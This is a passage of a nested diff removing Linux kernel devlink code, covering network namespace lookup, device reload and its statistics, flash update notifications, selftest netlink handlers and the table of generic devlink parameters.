+-	struct nlattr *netns_fd_attr = info->attrs[DEVLINK_ATTR_NETNS_FD];
+-	struct nlattr *netns_id_attr = info->attrs[DEVLINK_ATTR_NETNS_ID];
+-	struct net *net;
+-
+-	if (!!netns_pid_attr + !!netns_fd_attr + !!netns_id_attr > 1) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "multiple netns identifying attributes specified");
+-		return ERR_PTR(-EINVAL);
+-	}
+-
+-	if (netns_pid_attr) {
+-		net = get_net_ns_by_pid(nla_get_u32(netns_pid_attr));
+-	} else if (netns_fd_attr) {
+-		net = get_net_ns_by_fd(nla_get_u32(netns_fd_attr));
+-	} else if (netns_id_attr) {
+-		net = get_net_ns_by_id(sock_net(skb->sk),
+-				       nla_get_u32(netns_id_attr));
+-		if (!net)
+-			net = ERR_PTR(-EINVAL);
+-	} else {
+-		WARN_ON(1);
+-		net = ERR_PTR(-EINVAL);
+-	}
+-	if (IS_ERR(net)) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "Unknown network namespace");
+-		return ERR_PTR(-EINVAL);
+-	}
+-	if (!netlink_ns_capable(skb, net->user_ns, CAP_NET_ADMIN)) {
+-		put_net(net);
+-		return ERR_PTR(-EPERM);
+-	}
+-	return net;
+-}
+-
+-static void devlink_param_notify(struct devlink *devlink,
+-				 unsigned int port_index,
+-				 struct devlink_param_item *param_item,
+-				 enum devlink_command cmd);
+-
+-static void devlink_ns_change_notify(struct devlink *devlink,
+-				     struct net *dest_net, struct net *curr_net,
+-				     bool new)
+-{
+-	struct devlink_param_item *param_item;
+-	enum devlink_command cmd;
+-
+-	/* Userspace needs to be notified about devlink objects
+-	 * removed from original and entering new network namespace.
+-	 * The rest of the devlink objects are re-created during
+-	 * reload process so the notifications are generated separatelly.
+-	 */
+-
+-	if (!dest_net || net_eq(dest_net, curr_net))
+-		return;
+-
+-	if (new)
+-		devlink_notify(devlink, DEVLINK_CMD_NEW);
+-
+-	cmd = new ? DEVLINK_CMD_PARAM_NEW : DEVLINK_CMD_PARAM_DEL;
+-	list_for_each_entry(param_item, &devlink->param_list, list)
+-		devlink_param_notify(devlink, 0, param_item, cmd);
+-
+-	if (!new)
+-		devlink_notify(devlink, DEVLINK_CMD_DEL);
+-}
+-
+-static bool devlink_reload_supported(const struct devlink_ops *ops)
+-{
+-	return ops->reload_down && ops->reload_up;
+-}
+-
+-static void devlink_reload_failed_set(struct devlink *devlink,
+-				      bool reload_failed)
+-{
+-	if (devlink->reload_failed == reload_failed)
+-		return;
+-	devlink->reload_failed = reload_failed;
+-	devlink_notify(devlink, DEVLINK_CMD_NEW);
+-}
+-
+-bool devlink_is_reload_failed(const struct devlink *devlink)
+-{
+-	return devlink->reload_failed;
+-}
+-EXPORT_SYMBOL_GPL(devlink_is_reload_failed);
+-
+-static void
+-__devlink_reload_stats_update(struct devlink *devlink, u32 *reload_stats,
+-			      enum devlink_reload_limit limit, u32 actions_performed)
+-{
+-	unsigned long actions = actions_performed;
+-	int stat_idx;
+-	int action;
+-
+-	for_each_set_bit(action, &actions, __DEVLINK_RELOAD_ACTION_MAX) {
+-		stat_idx = limit * __DEVLINK_RELOAD_ACTION_MAX + action;
+-		reload_stats[stat_idx]++;
+-	}
+-	devlink_notify(devlink, DEVLINK_CMD_NEW);
+-}
+-
+-static void
+-devlink_reload_stats_update(struct devlink *devlink, enum devlink_reload_limit limit,
+-			    u32 actions_performed)
+-{
+-	__devlink_reload_stats_update(devlink, devlink->stats.reload_stats, limit,
+-				      actions_performed);
+-}
+-
+-/**
+- *	devlink_remote_reload_actions_performed - Update devlink on reload actions
+- *	  performed which are not a direct result of devlink reload call.
+- *
+- *	This should be called by a driver after performing reload actions in case it was not
+- *	a result of devlink reload call. For example fw_activate was performed as a result
+- *	of devlink reload triggered fw_activate on another host.
+- *	The motivation for this function is to keep data on reload actions performed on this
+- *	function whether it was done due to direct devlink reload call or not.
+- *
+- *	@devlink: devlink
+- *	@limit: reload limit
+- *	@actions_performed: bitmask of actions performed
+- */
+-void devlink_remote_reload_actions_performed(struct devlink *devlink,
+-					     enum devlink_reload_limit limit,
+-					     u32 actions_performed)
+-{
+-	if (WARN_ON(!actions_performed ||
+-		    actions_performed & BIT(DEVLINK_RELOAD_ACTION_UNSPEC) ||
+-		    actions_performed >= BIT(__DEVLINK_RELOAD_ACTION_MAX) ||
+-		    limit > DEVLINK_RELOAD_LIMIT_MAX))
+-		return;
+-
+-	__devlink_reload_stats_update(devlink, devlink->stats.remote_reload_stats, limit,
+-				      actions_performed);
+-}
+-EXPORT_SYMBOL_GPL(devlink_remote_reload_actions_performed);
+-
+-static int devlink_reload(struct devlink *devlink, struct net *dest_net,
+-			  enum devlink_reload_action action, enum devlink_reload_limit limit,
+-			  u32 *actions_performed, struct netlink_ext_ack *extack)
+-{
+-	u32 remote_reload_stats[DEVLINK_RELOAD_STATS_ARRAY_SIZE];
+-	struct net *curr_net;
+-	int err;
+-
+-	memcpy(remote_reload_stats, devlink->stats.remote_reload_stats,
+-	       sizeof(remote_reload_stats));
+-
+-	curr_net = devlink_net(devlink);
+-	devlink_ns_change_notify(devlink, dest_net, curr_net, false);
+-	err = devlink->ops->reload_down(devlink, !!dest_net, action, limit, extack);
+-	if (err)
+-		return err;
+-
+-	if (dest_net && !net_eq(dest_net, curr_net))
+-		write_pnet(&devlink->_net, dest_net);
+-
+-	err = devlink->ops->reload_up(devlink, action, limit, actions_performed, extack);
+-	devlink_reload_failed_set(devlink, !!err);
+-	if (err)
+-		return err;
+-
+-	devlink_ns_change_notify(devlink, dest_net, curr_net, true);
+-	WARN_ON(!(*actions_performed & BIT(action)));
+-	/* Catch driver on updating the remote action within devlink reload */
+-	WARN_ON(memcmp(remote_reload_stats, devlink->stats.remote_reload_stats,
+-		       sizeof(remote_reload_stats)));
+-	devlink_reload_stats_update(devlink, limit, *actions_performed);
+-	return 0;
+-}
+-
+-static int
+-devlink_nl_reload_actions_performed_snd(struct devlink *devlink, u32 actions_performed,
+-					enum devlink_command cmd, struct genl_info *info)
+-{
+-	struct sk_buff *msg;
+-	void *hdr;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	hdr = genlmsg_put(msg, info->snd_portid, info->snd_seq, &devlink_nl_family, 0, cmd);
+-	if (!hdr)
+-		goto free_msg;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-
+-	if (nla_put_bitfield32(msg, DEVLINK_ATTR_RELOAD_ACTIONS_PERFORMED, actions_performed,
+-			       actions_performed))
+-		goto nla_put_failure;
+-	genlmsg_end(msg, hdr);
+-
+-	return genlmsg_reply(msg, info);
+-
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-free_msg:
+-	nlmsg_free(msg);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_nl_cmd_reload(struct sk_buff *skb, struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	enum devlink_reload_action action;
+-	enum devlink_reload_limit limit;
+-	struct net *dest_net = NULL;
+-	u32 actions_performed;
+-	int err;
+-
+-	if (!(devlink->features & DEVLINK_F_RELOAD))
+-		return -EOPNOTSUPP;
+-
+-	err = devlink_resources_validate(devlink, NULL, info);
+-	if (err) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "resources size validation failed");
+-		return err;
+-	}
+-
+-	if (info->attrs[DEVLINK_ATTR_RELOAD_ACTION])
+-		action = nla_get_u8(info->attrs[DEVLINK_ATTR_RELOAD_ACTION]);
+-	else
+-		action = DEVLINK_RELOAD_ACTION_DRIVER_REINIT;
+-
+-	if (!devlink_reload_action_is_supported(devlink, action)) {
+-		NL_SET_ERR_MSG_MOD(info->extack,
+-				   "Requested reload action is not supported by the driver");
+-		return -EOPNOTSUPP;
+-	}
+-
+-	limit = DEVLINK_RELOAD_LIMIT_UNSPEC;
+-	if (info->attrs[DEVLINK_ATTR_RELOAD_LIMITS]) {
+-		struct nla_bitfield32 limits;
+-		u32 limits_selected;
+-
+-		limits = nla_get_bitfield32(info->attrs[DEVLINK_ATTR_RELOAD_LIMITS]);
+-		limits_selected = limits.value & limits.selector;
+-		if (!limits_selected) {
+-			NL_SET_ERR_MSG_MOD(info->extack, "Invalid limit selected");
+-			return -EINVAL;
+-		}
+-		for (limit = 0 ; limit <= DEVLINK_RELOAD_LIMIT_MAX ; limit++)
+-			if (limits_selected & BIT(limit))
+-				break;
+-		/* UAPI enables multiselection, but currently it is not used */
+-		if (limits_selected != BIT(limit)) {
+-			NL_SET_ERR_MSG_MOD(info->extack,
+-					   "Multiselection of limit is not supported");
+-			return -EOPNOTSUPP;
+-		}
+-		if (!devlink_reload_limit_is_supported(devlink, limit)) {
+-			NL_SET_ERR_MSG_MOD(info->extack,
+-					   "Requested limit is not supported by the driver");
+-			return -EOPNOTSUPP;
+-		}
+-		if (devlink_reload_combination_is_invalid(action, limit)) {
+-			NL_SET_ERR_MSG_MOD(info->extack,
+-					   "Requested limit is invalid for this action");
+-			return -EINVAL;
+-		}
+-	}
+-	if (info->attrs[DEVLINK_ATTR_NETNS_PID] ||
+-	    info->attrs[DEVLINK_ATTR_NETNS_FD] ||
+-	    info->attrs[DEVLINK_ATTR_NETNS_ID]) {
+-		dest_net = devlink_netns_get(skb, info);
+-		if (IS_ERR(dest_net))
+-			return PTR_ERR(dest_net);
+-	}
+-
+-	err = devlink_reload(devlink, dest_net, action, limit, &actions_performed, info->extack);
+-
+-	if (dest_net)
+-		put_net(dest_net);
+-
+-	if (err)
+-		return err;
+-	/* For backward compatibility generate reply only if attributes used by user */
+-	if (!info->attrs[DEVLINK_ATTR_RELOAD_ACTION] && !info->attrs[DEVLINK_ATTR_RELOAD_LIMITS])
+-		return 0;
+-
+-	return devlink_nl_reload_actions_performed_snd(devlink, actions_performed,
+-						       DEVLINK_CMD_RELOAD, info);
+-}
+-
+-static int devlink_nl_flash_update_fill(struct sk_buff *msg,
+-					struct devlink *devlink,
+-					enum devlink_command cmd,
+-					struct devlink_flash_notify *params)
+-{
+-	void *hdr;
+-
+-	hdr = genlmsg_put(msg, 0, 0, &devlink_nl_family, 0, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-
+-	if (cmd != DEVLINK_CMD_FLASH_UPDATE_STATUS)
+-		goto out;
+-
+-	if (params->status_msg &&
+-	    nla_put_string(msg, DEVLINK_ATTR_FLASH_UPDATE_STATUS_MSG,
+-			   params->status_msg))
+-		goto nla_put_failure;
+-	if (params->component &&
+-	    nla_put_string(msg, DEVLINK_ATTR_FLASH_UPDATE_COMPONENT,
+-			   params->component))
+-		goto nla_put_failure;
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_FLASH_UPDATE_STATUS_DONE,
+-			      params->done, DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_FLASH_UPDATE_STATUS_TOTAL,
+-			      params->total, DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_FLASH_UPDATE_STATUS_TIMEOUT,
+-			      params->timeout, DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-
+-out:
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static void __devlink_flash_update_notify(struct devlink *devlink,
+-					  enum devlink_command cmd,
+-					  struct devlink_flash_notify *params)
+-{
+-	struct sk_buff *msg;
+-	int err;
+-
+-	WARN_ON(cmd != DEVLINK_CMD_FLASH_UPDATE &&
+-		cmd != DEVLINK_CMD_FLASH_UPDATE_END &&
+-		cmd != DEVLINK_CMD_FLASH_UPDATE_STATUS);
+-
+-	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
+-		return;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return;
+-
+-	err = devlink_nl_flash_update_fill(msg, devlink, cmd, params);
+-	if (err)
+-		goto out_free_msg;
+-
+-	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
+-				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
+-	return;
+-
+-out_free_msg:
+-	nlmsg_free(msg);
+-}
+-
+-static void devlink_flash_update_begin_notify(struct devlink *devlink)
+-{
+-	struct devlink_flash_notify params = {};
+-
+-	__devlink_flash_update_notify(devlink,
+-				      DEVLINK_CMD_FLASH_UPDATE,
+-				      &params);
+-}
+-
+-static void devlink_flash_update_end_notify(struct devlink *devlink)
+-{
+-	struct devlink_flash_notify params = {};
+-
+-	__devlink_flash_update_notify(devlink,
+-				      DEVLINK_CMD_FLASH_UPDATE_END,
+-				      &params);
+-}
+-
+-void devlink_flash_update_status_notify(struct devlink *devlink,
+-					const char *status_msg,
+-					const char *component,
+-					unsigned long done,
+-					unsigned long total)
+-{
+-	struct devlink_flash_notify params = {
+-		.status_msg = status_msg,
+-		.component = component,
+-		.done = done,
+-		.total = total,
+-	};
+-
+-	__devlink_flash_update_notify(devlink,
+-				      DEVLINK_CMD_FLASH_UPDATE_STATUS,
+-				      &params);
+-}
+-EXPORT_SYMBOL_GPL(devlink_flash_update_status_notify);
+-
+-void devlink_flash_update_timeout_notify(struct devlink *devlink,
+-					 const char *status_msg,
+-					 const char *component,
+-					 unsigned long timeout)
+-{
+-	struct devlink_flash_notify params = {
+-		.status_msg = status_msg,
+-		.component = component,
+-		.timeout = timeout,
+-	};
+-
+-	__devlink_flash_update_notify(devlink,
+-				      DEVLINK_CMD_FLASH_UPDATE_STATUS,
+-				      &params);
+-}
+-EXPORT_SYMBOL_GPL(devlink_flash_update_timeout_notify);
+-
+-struct devlink_info_req {
+-	struct sk_buff *msg;
+-	void (*version_cb)(const char *version_name,
+-			   enum devlink_info_version_type version_type,
+-			   void *version_cb_priv);
+-	void *version_cb_priv;
+-};
+-
+-struct devlink_flash_component_lookup_ctx {
+-	const char *lookup_name;
+-	bool lookup_name_found;
+-};
+-
+-static void
+-devlink_flash_component_lookup_cb(const char *version_name,
+-				  enum devlink_info_version_type version_type,
+-				  void *version_cb_priv)
+-{
+-	struct devlink_flash_component_lookup_ctx *lookup_ctx = version_cb_priv;
+-
+-	if (version_type != DEVLINK_INFO_VERSION_TYPE_COMPONENT ||
+-	    lookup_ctx->lookup_name_found)
+-		return;
+-
+-	lookup_ctx->lookup_name_found =
+-		!strcmp(lookup_ctx->lookup_name, version_name);
+-}
+-
+-static int devlink_flash_component_get(struct devlink *devlink,
+-				       struct nlattr *nla_component,
+-				       const char **p_component,
+-				       struct netlink_ext_ack *extack)
+-{
+-	struct devlink_flash_component_lookup_ctx lookup_ctx = {};
+-	struct devlink_info_req req = {};
+-	const char *component;
+-	int ret;
+-
+-	if (!nla_component)
+-		return 0;
+-
+-	component = nla_data(nla_component);
+-
+-	if (!devlink->ops->info_get) {
+-		NL_SET_ERR_MSG_ATTR(extack, nla_component,
+-				    "component update is not supported by this device");
+-		return -EOPNOTSUPP;
+-	}
+-
+-	lookup_ctx.lookup_name = component;
+-	req.version_cb = devlink_flash_component_lookup_cb;
+-	req.version_cb_priv = &lookup_ctx;
+-
+-	ret = devlink->ops->info_get(devlink, &req, NULL);
+-	if (ret)
+-		return ret;
+-
+-	if (!lookup_ctx.lookup_name_found) {
+-		NL_SET_ERR_MSG_ATTR(extack, nla_component,
+-				    "selected component is not supported by this device");
+-		return -EINVAL;
+-	}
+-	*p_component = component;
+-	return 0;
+-}
+-
+-static int devlink_nl_cmd_flash_update(struct sk_buff *skb,
+-				       struct genl_info *info)
+-{
+-	struct nlattr *nla_overwrite_mask, *nla_file_name;
+-	struct devlink_flash_update_params params = {};
+-	struct devlink *devlink = info->user_ptr[0];
+-	const char *file_name;
+-	u32 supported_params;
+-	int ret;
+-
+-	if (!devlink->ops->flash_update)
+-		return -EOPNOTSUPP;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_FLASH_UPDATE_FILE_NAME))
+-		return -EINVAL;
+-
+-	ret = devlink_flash_component_get(devlink,
+-					  info->attrs[DEVLINK_ATTR_FLASH_UPDATE_COMPONENT],
+-					  &params.component, info->extack);
+-	if (ret)
+-		return ret;
+-
+-	supported_params = devlink->ops->supported_flash_update_params;
+-
+-	nla_overwrite_mask = info->attrs[DEVLINK_ATTR_FLASH_UPDATE_OVERWRITE_MASK];
+-	if (nla_overwrite_mask) {
+-		struct nla_bitfield32 sections;
+-
+-		if (!(supported_params & DEVLINK_SUPPORT_FLASH_UPDATE_OVERWRITE_MASK)) {
+-			NL_SET_ERR_MSG_ATTR(info->extack, nla_overwrite_mask,
+-					    "overwrite settings are not supported by this device");
+-			return -EOPNOTSUPP;
+-		}
+-		sections = nla_get_bitfield32(nla_overwrite_mask);
+-		params.overwrite_mask = sections.value & sections.selector;
+-	}
+-
+-	nla_file_name = info->attrs[DEVLINK_ATTR_FLASH_UPDATE_FILE_NAME];
+-	file_name = nla_data(nla_file_name);
+-	ret = request_firmware(&params.fw, file_name, devlink->dev);
+-	if (ret) {
+-		NL_SET_ERR_MSG_ATTR(info->extack, nla_file_name, "failed to locate the requested firmware file");
+-		return ret;
+-	}
+-
+-	devlink_flash_update_begin_notify(devlink);
+-	ret = devlink->ops->flash_update(devlink, &params, info->extack);
+-	devlink_flash_update_end_notify(devlink);
+-
+-	release_firmware(params.fw);
+-
+-	return ret;
+-}
+-
+-static int
+-devlink_nl_selftests_fill(struct sk_buff *msg, struct devlink *devlink,
+-			  u32 portid, u32 seq, int flags,
+-			  struct netlink_ext_ack *extack)
+-{
+-	struct nlattr *selftests;
+-	void *hdr;
+-	int err;
+-	int i;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags,
+-			  DEVLINK_CMD_SELFTESTS_GET);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	err = -EMSGSIZE;
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto err_cancel_msg;
+-
+-	selftests = nla_nest_start(msg, DEVLINK_ATTR_SELFTESTS);
+-	if (!selftests)
+-		goto err_cancel_msg;
+-
+-	for (i = DEVLINK_ATTR_SELFTEST_ID_UNSPEC + 1;
+-	     i <= DEVLINK_ATTR_SELFTEST_ID_MAX; i++) {
+-		if (devlink->ops->selftest_check(devlink, i, extack)) {
+-			err = nla_put_flag(msg, i);
+-			if (err)
+-				goto err_cancel_msg;
+-		}
+-	}
+-
+-	nla_nest_end(msg, selftests);
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-err_cancel_msg:
+-	genlmsg_cancel(msg, hdr);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_selftests_get_doit(struct sk_buff *skb,
+-					     struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct sk_buff *msg;
+-	int err;
+-
+-	if (!devlink->ops->selftest_check)
+-		return -EOPNOTSUPP;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_selftests_fill(msg, devlink, info->snd_portid,
+-					info->snd_seq, 0, info->extack);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static int devlink_nl_cmd_selftests_get_dumpit(struct sk_buff *msg,
+-					       struct netlink_callback *cb)
+-{
+-	struct devlink *devlink;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err = 0;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		if (idx < start || !devlink->ops->selftest_check)
+-			goto inc;
+-
+-		devl_lock(devlink);
+-		err = devlink_nl_selftests_fill(msg, devlink,
+-						NETLINK_CB(cb->skb).portid,
+-						cb->nlh->nlmsg_seq, NLM_F_MULTI,
+-						cb->extack);
+-		devl_unlock(devlink);
+-		if (err) {
+-			devlink_put(devlink);
+-			break;
+-		}
+-inc:
+-		idx++;
+-		devlink_put(devlink);
+-	}
+-
+-	if (err != -EMSGSIZE)
+-		return err;
+-
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int devlink_selftest_result_put(struct sk_buff *skb, unsigned int id,
+-				       enum devlink_selftest_status test_status)
+-{
+-	struct nlattr *result_attr;
+-
+-	result_attr = nla_nest_start(skb, DEVLINK_ATTR_SELFTEST_RESULT);
+-	if (!result_attr)
+-		return -EMSGSIZE;
+-
+-	if (nla_put_u32(skb, DEVLINK_ATTR_SELFTEST_RESULT_ID, id) ||
+-	    nla_put_u8(skb, DEVLINK_ATTR_SELFTEST_RESULT_STATUS,
+-		       test_status))
+-		goto nla_put_failure;
+-
+-	nla_nest_end(skb, result_attr);
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, result_attr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_nl_cmd_selftests_run(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct nlattr *tb[DEVLINK_ATTR_SELFTEST_ID_MAX + 1];
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct nlattr *attrs, *selftests;
+-	struct sk_buff *msg;
+-	void *hdr;
+-	int err;
+-	int i;
+-
+-	if (!devlink->ops->selftest_run || !devlink->ops->selftest_check)
+-		return -EOPNOTSUPP;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_SELFTESTS))
+-		return -EINVAL;
+-
+-	attrs = info->attrs[DEVLINK_ATTR_SELFTESTS];
+-
+-	err = nla_parse_nested(tb, DEVLINK_ATTR_SELFTEST_ID_MAX, attrs,
+-			       devlink_selftest_nl_policy, info->extack);
+-	if (err < 0)
+-		return err;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = -EMSGSIZE;
+-	hdr = genlmsg_put(msg, info->snd_portid, info->snd_seq,
+-			  &devlink_nl_family, 0, DEVLINK_CMD_SELFTESTS_RUN);
+-	if (!hdr)
+-		goto free_msg;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto genlmsg_cancel;
+-
+-	selftests = nla_nest_start(msg, DEVLINK_ATTR_SELFTESTS);
+-	if (!selftests)
+-		goto genlmsg_cancel;
+-
+-	for (i = DEVLINK_ATTR_SELFTEST_ID_UNSPEC + 1;
+-	     i <= DEVLINK_ATTR_SELFTEST_ID_MAX; i++) {
+-		enum devlink_selftest_status test_status;
+-
+-		if (nla_get_flag(tb[i])) {
+-			if (!devlink->ops->selftest_check(devlink, i,
+-							  info->extack)) {
+-				if (devlink_selftest_result_put(msg, i,
+-								DEVLINK_SELFTEST_STATUS_SKIP))
+-					goto selftests_nest_cancel;
+-				continue;
+-			}
+-
+-			test_status = devlink->ops->selftest_run(devlink, i,
+-								 info->extack);
+-			if (devlink_selftest_result_put(msg, i, test_status))
+-				goto selftests_nest_cancel;
+-		}
+-	}
+-
+-	nla_nest_end(msg, selftests);
+-	genlmsg_end(msg, hdr);
+-	return genlmsg_reply(msg, info);
+-
+-selftests_nest_cancel:
+-	nla_nest_cancel(msg, selftests);
+-genlmsg_cancel:
+-	genlmsg_cancel(msg, hdr);
+-free_msg:
+-	nlmsg_free(msg);
+-	return err;
+-}
+-
+-static const struct devlink_param devlink_param_generic[] = {
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_INT_ERR_RESET,
+-		.name = DEVLINK_PARAM_GENERIC_INT_ERR_RESET_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_INT_ERR_RESET_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_MAX_MACS,
+-		.name = DEVLINK_PARAM_GENERIC_MAX_MACS_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_MAX_MACS_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_SRIOV,
+-		.name = DEVLINK_PARAM_GENERIC_ENABLE_SRIOV_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_ENABLE_SRIOV_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_REGION_SNAPSHOT,
+-		.name = DEVLINK_PARAM_GENERIC_REGION_SNAPSHOT_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_REGION_SNAPSHOT_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_IGNORE_ARI,
+-		.name = DEVLINK_PARAM_GENERIC_IGNORE_ARI_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_IGNORE_ARI_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_MSIX_VEC_PER_PF_MAX,
+-		.name = DEVLINK_PARAM_GENERIC_MSIX_VEC_PER_PF_MAX_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_MSIX_VEC_PER_PF_MAX_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_MSIX_VEC_PER_PF_MIN,
+-		.name = DEVLINK_PARAM_GENERIC_MSIX_VEC_PER_PF_MIN_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_MSIX_VEC_PER_PF_MIN_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_FW_LOAD_POLICY,
+-		.name = DEVLINK_PARAM_GENERIC_FW_LOAD_POLICY_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_FW_LOAD_POLICY_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_RESET_DEV_ON_DRV_PROBE,
+-		.name = DEVLINK_PARAM_GENERIC_RESET_DEV_ON_DRV_PROBE_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_RESET_DEV_ON_DRV_PROBE_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_ROCE,
+-		.name = DEVLINK_PARAM_GENERIC_ENABLE_ROCE_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_ENABLE_ROCE_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_REMOTE_DEV_RESET,
+-		.name = DEVLINK_PARAM_GENERIC_ENABLE_REMOTE_DEV_RESET_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_ENABLE_REMOTE_DEV_RESET_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_ETH,
+-		.name = DEVLINK_PARAM_GENERIC_ENABLE_ETH_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_ENABLE_ETH_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_RDMA,
+-		.name = DEVLINK_PARAM_GENERIC_ENABLE_RDMA_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_ENABLE_RDMA_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_VNET,
+-		.name = DEVLINK_PARAM_GENERIC_ENABLE_VNET_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_ENABLE_VNET_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_IWARP,
+-		.name = DEVLINK_PARAM_GENERIC_ENABLE_IWARP_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_ENABLE_IWARP_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_IO_EQ_SIZE,
+-		.name = DEVLINK_PARAM_GENERIC_IO_EQ_SIZE_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_IO_EQ_SIZE_TYPE,
+-	},
+-	{
+-		.id = DEVLINK_PARAM_GENERIC_ID_EVENT_EQ_SIZE,
+-		.name = DEVLINK_PARAM_GENERIC_EVENT_EQ_SIZE_NAME,
+-		.type = DEVLINK_PARAM_GENERIC_EVENT_EQ_SIZE_TYPE,
+-	},
+-};
+-
+-static int devlink_param_generic_verify(const struct devlink_param *param)
+-{
+-	/* verify it match generic parameter by id and name */
+-	if (param->id > DEVLINK_PARAM_GENERIC_ID_MAX)
+-		return -EINVAL;
+-	if (strcmp(param->name, devlink_param_generic[param->id].name))
+-		return -ENOENT;
+-
+-	WARN_ON(param->type != devlink_param_generic[param->id].type);
+-
+-	return 0;
+-}
+-
+-static int devlink_param_driver_verify(const struct devlink_param *param)
+-{
+-	int i;
+-
+-	if (param->id <= DEVLINK_PARAM_GENERIC_ID_MAX)
+-		return -EINVAL;
+-	/* verify no such name in generic params */
+-	for (i = 0; i <= DEVLINK_PARAM_GENERIC_ID_MAX; i++)
+-		if (!strcmp(param->name, devlink_param_generic[i].name))
+-			return -EEXIST;
+-
+-	return 0;
+-}
+-
+-static struct devlink_param_item *
+-devlink_param_find_by_name(struct list_head *param_list,
+-			   const char *param_name)
+-{
+-	struct devlink_param_item *param_item;
+-
+-	list_for_each_entry(param_item, param_list, list)
+-		if (!strcmp(param_item->param->name, param_name))
+-			return param_item;
+-	return NULL;
+-}
+-
+-static struct devlink_param_item *
+-devlink_param_find_by_id(struct list_head *param_list, u32 param_id)
+-{
+-	struct devlink_param_item *param_item;
+-
+-	list_for_each_entry(param_item, param_list, list)
+-		if (param_item->param->id == param_id)
+-			return param_item;
+-	return NULL;
+-}
+-
+-static bool
+-devlink_param_cmode_is_supported(const struct devlink_param *param,
+-				 enum devlink_param_cmode cmode)
+-{
+-	return test_bit(cmode, &param->supported_cmodes);
